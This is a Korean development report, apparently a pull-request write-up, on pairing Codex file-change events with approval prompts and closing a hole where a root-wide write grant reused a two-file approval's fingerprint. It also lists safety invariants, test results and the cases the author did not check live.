내용을 실어온 것은 `item/started` (`item.type === "fileChange"`, `item.changes` 동봉) 다.

> patchUpdated 만 색인했다면 ★시험은 전부 통과하면서 실물에서는 짝이 하나도 안 맞아★ 전부 ask 로
> 떨어졌을 것이다. ★안전하지만 무용지물이고, 그걸 아무 시험도 못 잡았을 것이다.★

이건 #120 하네스가 준 교훈("넷이 판정 로직만 파고 ★이걸 켤 수 있나★ 를 아무도 안 물었다")을
내 트랙에 적용해서 나온 것이다.

**③ 덤: `add` 의 diff 는 통일diff 가 아니라 ★파일 원문★ 이다**
라이브 실측: `add` → `"HELLO\n"` · `update` → `"@@ -1,4 +1,3 @@\n alpha\n-bravo\n+BRAVO-CHANGED\n..."`.
둘 다 통일diff 로 가정하고 `+`/`-` 만 세면 ★새 파일 생성이 전부 "(+0/-0)"★ 으로 보인다 —
승인 화면에서 ★"아무것도 안 바뀐다" 는 제일 나쁜 거짓말★ 이다.

## ★부수로 발견한 기존 구멍 — 구세대에도 있다★

`grantRoot` = "세션 동안 ★이 루트 하위 전체★ 에 쓰기 허용" 요청인데, ★열쇠에도 지문에도 전혀 반영되지 않았다.★

정본 `4430021` 에서 실측(변경 전 코드):

| 요청 | scope target | 지문 |
|---|---|---|
| `applyPatchApproval` 파일 2개 | `a.ts\|b.ts` | `c7fa63459c642993` |
| 같은 요청 + `grantRoot=/repo` | `a.ts\|b.ts` | `c7fa63459c642993` |

★완전히 같다.★ 즉 파일 두 개에 준 '항상 허용' 이 ★루트 전체 승인★ 에 그대로 재사용된다 —
사람은 파일 두 개를 승인했는데 열리는 것은 폴더 전체다.

→ ★양 세대 모두★ 열쇠 맨 앞에 `grant_root=` 를 넣고(permissionGate 가 target 을 ★앞 240자만★ 쓰므로
★제일 위험한 정보가 잘려나가면 안 된다★), 팝업 text 에 경고를 띄운다.

## 안전 불변식 (팀 리드 원칙: "애매하면 통과가 아니고 ask")

- ★turn 이 다르면 짝이 아니다★ — 항목마다 turnId 를 저장해 대조 + 턴 시작마다 색인 초기화(2중)
- ★짝이 없으면 내용을 지어내지 않는다★ — 기존 ask 경로(매번 묻기) 그대로 유지
- ★빈 변경목록은 기억하지 않는다★ — '내용 없는 쓰기 승인' 방지
- ★상한 초과 시 폐기★ — 폐기 = 짝 없음 = ask. ★버리는 방향이 안전한 방향★
- ★diff 원문은 팝업 text 에 안 싣는다★ — 파일 내용이 Tier-D 스캔에 걸려 멀쩡한 코드가 차단되지 않게

## 검증

- 신규 시험 ★31건★ (색인 12 · 해석 19)
- ★라이브 실측 payload 재생 2건★ — 실제 app-server 에서 받은 원문을 그대로 붙여 한 바퀴 돌린다
- ★실물 배선 실증★(env-gated smoke, 지금 1회 실행 통과) — 진짜 codex 를 띄워 파일 수정을 시키고
  `onApproval` 이 `observedItem` 을 받는 것 확인. ★승인은 거절 → 파일 생성 안 됨(확인함).★
- ★뮤턴트 9종 전부 사망★ — 그리고 ★1종이 처음에 살아남아 시험 1건을 추가★ 했다(혼합 payload.
  S1 에서 Codex 가 잡았던 것과 같은 계열). 두 번째 커밋이 그것이다.
- 구세대 지문 golden ★2종 불변★ (`c7fa63459c642993` · `b1a8a5879bc13205`) — 진행 중 승인의
  상관키가 어긋나면 결정이 배달되지 않는다
- 전체 ★1885 pass / 0 fail★ · `tsc` 0
  (baseline 동일 커밋 1859 → 1891, ★델타 = 신규분 그대로★. 기존 시험 거동 변화 0)

## 범위

`src/server/runtimes/codex/` ★밖은 건드리지 않는다.★ 플래그 `B3OS_CODEX_APPSERVER` 는 ★여전히 꺼져 있다.★

## ★내가 확인 안 한 것★

- `delete` 종류의 diff 모양은 ★라이브로 못 봤다★ (통일diff 가 아니면 삭제 규모로 세도록 보수적으로 뒀다)
- `grantRoot` 에 ★실제 값이 실려 오는 경우★ 를 라이브로 못 봤다 — 두 번 다 `null` 이었다.
  스키마가 `[string, null]` 이고 벤더 주석이 UNSTABLE 이라 ★"오면 이렇게 다룬다"★ 까지만 한 것이다
- 여러 파일을 한 번에 바꾸는 승인 · 한 턴에 승인 2건 동시 — ★라이브로는 각 1건짜리만 봤다★
- 팝업이 실제 텔레그램에 어떻게 보이는지(플래그 ON 이 필요 — S2 이후 단계)
